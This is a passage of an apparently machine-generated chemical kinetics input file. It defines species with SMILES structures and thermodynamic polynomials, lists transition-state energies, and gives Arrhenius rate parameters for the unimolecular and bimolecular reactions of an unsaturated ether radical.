'C=COC(C)C=CC(3776)', structure = SMILES('C=COC(C)C=CC'), E0 = (-154.29,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.224767,0.0718746,-7.51271e-07,-5.87491e-08,2.98301e-11,-18385.7,31.1801], Tmin=(100,'K'), Tmax=(962.241,'K')), NASAPolynomial(coeffs=[23.0736,0.0259156,-8.43997e-06,1.54149e-09,-1.14178e-13,-25225.4,-92.5665], Tmin=(962.241,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-154.29,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH)"""), ) species( label = 'CC1C=CCC(C)O1(2305)', structure = SMILES('CC1C=CCC(C)O1'), E0 = (-198.986,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.905611,0.0441047,6.69373e-05,-1.19665e-07,4.97254e-11,-23799.2,23.5039], Tmin=(100,'K'), Tmax=(946.16,'K')), NASAPolynomial(coeffs=[17.9393,0.0323207,-9.86314e-06,1.72557e-09,-1.25577e-13,-29718.4,-71.9773], Tmin=(946.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-198.986,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(473.925,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + ring(36dihydro2hpyran)"""), ) species( label = 'CH2(T)(33)', structure = SMILES('[CH2]'), E0 = (381.08,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([971.045,2816.03,3444.23],'cm^-1')), ], 
spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (14.0266,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.71758,0.00127391,2.17347e-06,-3.48858e-09,1.65209e-12,45872.4,1.75298], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.14632,0.00303671,-9.96474e-07,1.50484e-10,-8.57336e-15,46041.3,4.72342], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(381.08,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: FFCM1(-)"""), ) species( label = '[CH]=CC(C)O[CH]C(3832)', structure = SMILES('[CH]=CC(C)O[CH]C'), E0 = (221.422,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3120,650,792.5,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (98.143,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = 
NASA(polynomials=[NASAPolynomial(coeffs=[0.112798,0.0779437,-6.72043e-05,2.99661e-08,-5.35848e-12,26777.1,30.3184], Tmin=(100,'K'), Tmax=(1339.63,'K')), NASAPolynomial(coeffs=[16.9371,0.0277067,-1.09518e-05,1.9713e-09,-1.33982e-13,22269.5,-55.7679], Tmin=(1339.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(221.422,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(Cds_P)"""), ) species( label = 'N2', structure = SMILES('N#N'), E0 = (-8.69489,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (28.0135,'amu'), collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""), ) species( label = 'Ne', structure = SMILES('[Ne]'), E0 = (-6.19738,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (20.1797,'amu'), collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! 
Try improving transport databases!"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""), ) transitionState( label = 'TS1', E0 = (69.8904,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS2', E0 = (100.754,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS3', E0 = (241.483,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS4', E0 = (193.461,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS5', E0 = (342.512,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS6', E0 = (97.1854,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS7', E0 = (223.155,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS8', E0 = (255.307,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS9', E0 = (259.387,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS10', E0 = (391.012,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS11', E0 = (227.624,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS12', E0 = (282.728,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS13', E0 = (338.084,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS14', E0 = (186.553,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS15', E0 = (223.976,'kJ/mol'), 
spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS16', E0 = (279.821,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS17', E0 = (273.713,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS18', E0 = (397.665,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS19', E0 = (295.826,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS20', E0 = (96.2496,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS21', E0 = (133.291,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS22', E0 = (109.115,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS23', E0 = (78.2584,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS24', E0 = (523.142,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS25', E0 = (330.774,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS26', E0 = (78.1747,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS27', E0 = (478.398,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS28', E0 = (464.193,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS29', E0 = (174.021,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS30', E0 = (277.622,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS31', E0 = (338.063,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS32', E0 = (191.494,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS33', E0 = (179.469,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS34', E0 = (204.457,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( 
label = 'TS35', E0 = (213.068,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS36', E0 = (94.8636,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS37', E0 = (77.4216,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS38', E0 = (602.501,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) reaction( label = 'reaction1', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC=CC(381)', 'CH3CHO(52)'], transitionState = 'TS1', kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ] Euclidian distance = 0 family: 1,4_Linear_birad_scission"""), ) reaction( label = 'reaction2', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH2]C1[CH]C(C)OC1C(3810)'], transitionState = 'TS2', kinetics = Arrhenius(A=(187000,'s^-1'), n=1.48, Ea=(30.8638,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R6;doublebond_intra_2H_pri;radadd_intra_csHNd] Euclidian distance = 0 family: Intra_R_Add_Exocyclic Ea raised from 23.9 to 30.9 kJ/mol to match endothermicity of reaction."""), ) reaction( label = 'reaction3', reactants = ['H(19)', 'C=CC=C(C)O[CH]C(3811)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS3', kinetics = Arrhenius(A=(170.641,'m^3/(mol*s)'), n=1.56204, Ea=(11.2897,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cds_Cds;HJ] for rate rule [Cds-OsCs_Cds;HJ] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction4', reactants = ['H(19)', 'C=C[CH]C(C)OC=C(3812)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS4', kinetics = Arrhenius(A=(6.67e+12,'cm^3/(mol*s)'), n=0.1, Ea=(6.4601,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 2816 used for Cds-HH_Cds-OsH;HJ Exact match found for rate rule 
[Cds-HH_Cds-OsH;HJ] Euclidian distance = 0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction5', reactants = ['H(19)', 'C=C=CC(C)O[CH]C(3813)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS5', kinetics = Arrhenius(A=(5.46e+08,'cm^3/(mol*s)'), n=1.64, Ea=(15.8155,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 2714 used for Ca_Cds-CsH;HJ Exact match found for rate rule [Ca_Cds-CsH;HJ] Euclidian distance = 0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction6', reactants = ['CH3CHO(52)', '[CH2]C=C[CH]C(377)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS6', kinetics = Arrhenius(A=(4e+09,'cm^3/(mol*s)'), n=1.39, Ea=(35.8862,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Od_CO-CsH;YJ] for rate rule [Od_CO-CsH;CJ] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction7', reactants = ['CH3(34)', 'C=CC=CO[CH]C(3814)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS7', kinetics = Arrhenius(A=(0.0063345,'m^3/(mol*s)'), n=2.46822, Ea=(26.7748,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cds_Cds;CsJ-HHH] for rate rule [Cds-OsH_Cds;CsJ-HHH] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction8', reactants = ['C=CC[C](C)O[CH]C(3815)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS8', kinetics = Arrhenius(A=(20108.5,'s^-1'), n=2.606, Ea=(121.63,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;C_rad_out_NonDe;Cs_H_out_H/Cd] for rate rule [R2H_S;C_rad_out_NDMustO;Cs_H_out_H/Cd] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction9', reactants = ['[CH2]COC(C)[CH]C=C(3816)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS9', kinetics = Arrhenius(A=(3.7e+13,'s^-1','+|-',2), n=-0.1, Ea=(158.364,'kJ/mol'), 
T0=(1,'K'), Tmin=(700,'K'), Tmax=(1800,'K'), comment="""From training reaction 347 used for R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO Exact match found for rate rule [R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction10', reactants = ['C=[C]CC(C)O[CH]C(3817)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS10', kinetics = Arrhenius(A=(1.9054e+11,'s^-1'), n=0.853, Ea=(200.196,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2H_S;Cd_rad_out_Cd;Cs_H_out_H/(NonDeC/Cs)] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction11', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=C[CH][C](C)OCC(3818)'], transitionState = 'TS11', kinetics = Arrhenius(A=(1.2544e+06,'s^-1'), n=1.86276, Ea=(157.734,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3H_SS;C_rad_out_H/NonDeC;XH_out] for rate rule [R3H_SS_O;C_rad_out_H/NonDeC;XH_out] Euclidian distance = 1.0 family: intra_H_migration"""), ) reaction( label = 'reaction12', reactants = ['[CH2]C(CC=C)O[CH]C(3819)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS12', kinetics = Arrhenius(A=(25000,'s^-1'), n=2.28, Ea=(119.244,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 85 used for R3H_SS_Cs;C_rad_out_2H;Cs_H_out_H/Cd Exact match found for rate rule [R3H_SS_Cs;C_rad_out_2H;Cs_H_out_H/Cd] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction13', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH]=CCC(C)O[CH]C(3820)'], transitionState = 'TS13', kinetics = Arrhenius(A=(8.32e+10,'s^-1'), n=0.77, Ea=(268.194,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 195 used for R3H_SD;C_rad_out_H/NonDeC;Cd_H_out_singleH Exact match found for rate rule 
[R3H_SD;C_rad_out_H/NonDeC;Cd_H_out_singleH] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction14', reactants = ['[CH2]C=CC([CH2])OCC(3772)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS14', kinetics = Arrhenius(A=(6.44e+09,'s^-1'), n=0.13, Ea=(86.6088,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 131 used for R4H_SSS;C_rad_out_2H;Cs_H_out_H/NonDeC Exact match found for rate rule [R4H_SSS;C_rad_out_2H;Cs_H_out_H/NonDeC] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction15', reactants = ['[CH2][CH]OC(C)CC=C(3821)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS15', kinetics = Arrhenius(A=(62296.1,'s^-1'), n=1.86, Ea=(59.4128,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;C_rad_out_2H;Cs_H_out_H/Cd] for rate rule [R5HJ_1;C_rad_out_2H;Cs_H_out_H/Cd] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction16', reactants = ['C=[C][CH]C(C)OCC(3822)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS16', kinetics = Arrhenius(A=(2.54505e+10,'s^-1'), n=0.959062, Ea=(152.545,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnH;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] for rate rule [R5HJ_1;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] Euclidian distance = 2.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction17', reactants = ['[CH]=C[CH]C(C)OCC(3823)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS17', kinetics = Arrhenius(A=(1.846e+10,'s^-1'), n=0.74, Ea=(145.185,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [RnH;Cd_rad_out_singleH;Cs_H_out_H/NonDeC] for rate rule [R6HJ_2;Cd_rad_out_singleH;Cs_H_out_H/NonDeC] Euclidian distance = 2.0 
Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction18', reactants = ['[CH2]C=C[CH]C(377)', 'C[CH][O](2420)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS18', kinetics = Arrhenius(A=(7.35017e+06,'m^3/(mol*s)'), n=0.0284742, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad] Euclidian distance = 0 family: R_Recombination Ea raised from -14.4 to 0 kJ/mol."""), ) reaction( label = 'reaction19', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[CH]OC(C)C1[CH]C1(3824)'], transitionState = 'TS19', kinetics = Arrhenius(A=(1.05e+08,'s^-1'), n=1.192, Ea=(225.936,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3_D;doublebond_intra_pri;radadd_intra_cs] for rate rule [R3_D;doublebond_intra_pri_2H;radadd_intra_csHCs] Euclidian distance = 2.2360679775 family: Intra_R_Add_Endocyclic"""), ) reaction( label = 'reaction20', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['CC1[CH][CH]CC(C)O1(3825)'], transitionState = 'TS20', kinetics = Arrhenius(A=(487000,'s^-1'), n=1.17, Ea=(26.3592,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R6_linear;doublebond_intra_pri_2H;radadd_intra_csHCs] Euclidian distance = 0 family: Intra_R_Add_Endocyclic"""), ) reaction( label = 'reaction21', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC=C(C)OCC(3826)'], transitionState = 'TS21', kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3radExo;Y_rad_NDe;XH_Rrad] for rate rule [R3radExo;Y_rad_NDe;XH_Rrad_De] Euclidian distance = 1.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction22', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CCC(C)OC=C(3827)'], transitionState = 'TS22', kinetics = Arrhenius(A=(5.55988e+09,'s^-1'), n=0.137, Ea=(39.225,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template 
[R5;Y_rad_De;XH_Rrad] for rate rule [R5radEndo;Y_rad_De;XH_Rrad] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction23', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=C=CC(C)OCC(3828)'], transitionState = 'TS23', kinetics = Arrhenius(A=(3.21e+09,'s^-1'), n=0.137, Ea=(8.368,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R5;Y_rad_NDe;XH_Rrad] for rate rule [R5radEndo;Y_rad_NDe;XH_Rrad] Euclidian distance = 1.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction24', reactants = ['CH2(S)(40)', 'C=C[CH]CO[CH]C(3798)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS24', kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: 1,2_Insertion_carbene Ea raised from -5.1 to 0 kJ/mol."""), ) reaction( label = 'reaction25', reactants = ['C=CC(C)[CH]O[CH]C(3829)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS25', kinetics = Arrhenius(A=(5.59192e+09,'s^-1'), n=1.025, Ea=(194.765,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [cCs(-HC)CJ;CsJ;CH3] Euclidian distance = 0 family: 1,2_shiftC"""), ) reaction( label = 'reaction26', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC1C(C)OC1C(2310)'], transitionState = 'TS26', kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;C_rad_out_single;Cpri_rad_out_single] for rate rule [R4_SSS;C_rad_out_H/NonDeC;Cpri_rad_out_H/OneDe] Euclidian distance = 2.82842712475 family: Birad_recombination"""), ) reaction( label = 'reaction27', reactants = ['CHCH3(T)(359)', 'C=C[CH]C(C)[O](3162)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS27', kinetics = 
Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad] Euclidian distance = 0 family: Birad_R_Recombination Ea raised from -2.9 to 0 kJ/mol."""), ) reaction( label = 'reaction28', reactants = ['[CH]=C[CH2](321)', 'C[CH]O[CH]C(3586)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS28', kinetics = Arrhenius(A=(4.4725e+06,'m^3/(mol*s)'), n=0.36814, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/CsO;Birad] Euclidian distance = 4.0 Multiplied by reaction path degeneracy 2.0 family: Birad_R_Recombination Ea raised from -1.7 to 0 kJ/mol."""), ) reaction( label = 'reaction29', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH2][CH]C1C(C)OC1C(3830)'], transitionState = 'TS29', kinetics = Arrhenius(A=(4.73e+06,'s^-1'), n=1.31, Ea=(104.13,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R5_SS_D;doublebond_intra;radadd_intra_csHNd] Euclidian distance = 0 family: Intra_R_Add_Exocyclic Ea raised from 98.9 to 104.1 kJ/mol to match endothermicity of reaction."""), ) reaction( label = 'reaction30', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[C]=CC(C)O[CH]C(3769)'], transitionState = 'TS30', kinetics = Arrhenius(A=(1.63e+08,'s^-1'), n=1.73, Ea=(207.731,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 123 used for R2H_S;C_rad_out_2H;Cd_H_out_doubleC Exact match found for rate rule [R2H_S;C_rad_out_2H;Cd_H_out_doubleC] Euclidian distance = 0 family: intra_H_migration"""), ) reaction( label = 'reaction31', reactants = ['C[CH]OC(C)[C]=CC(3767)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS31', kinetics = Arrhenius(A=(7.74e+09,'s^-1'), n=1.08, Ea=(161.921,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 198 used for 
R3H_DS;Cd_rad_out_Cs;Cs_H_out_2H Exact match found for rate rule [R3H_DS;Cd_rad_out_Cs;Cs_H_out_2H] Euclidian distance = 0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 'reaction32', reactants = ['[CH2]C=[C]C(C)OCC(3831)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS32', kinetics = Arrhenius(A=(74200,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_RSS;Cd_rad_out;Cs_H_out_1H] for rate rule [R4H_SSS;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] Euclidian distance = 2.44948974278 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction33', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[CH]O[C](C)C=CC(3764)'], transitionState = 'TS33', kinetics = Arrhenius(A=(1.86e+10,'s^-1'), n=0.58, Ea=(109.579,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H;C_rad_out_2H;Cs_H_out_NonDe] for rate rule [R4H_SDS;C_rad_out_2H;Cs_H_out_NDMustO] Euclidian distance = 2.2360679775 family: intra_H_migration"""), ) reaction( label = 'reaction16', reactants = ['[CH2]C(C=CC)O[CH]C(2304)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS34', kinetics = Arrhenius(A=(121000,'s^-1'), n=1.9, Ea=(55.6472,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 92 used for R5H_SSMS;C_rad_out_2H;Cs_H_out_2H Exact match found for rate rule [R5H_SSMS;C_rad_out_2H;Cs_H_out_2H] 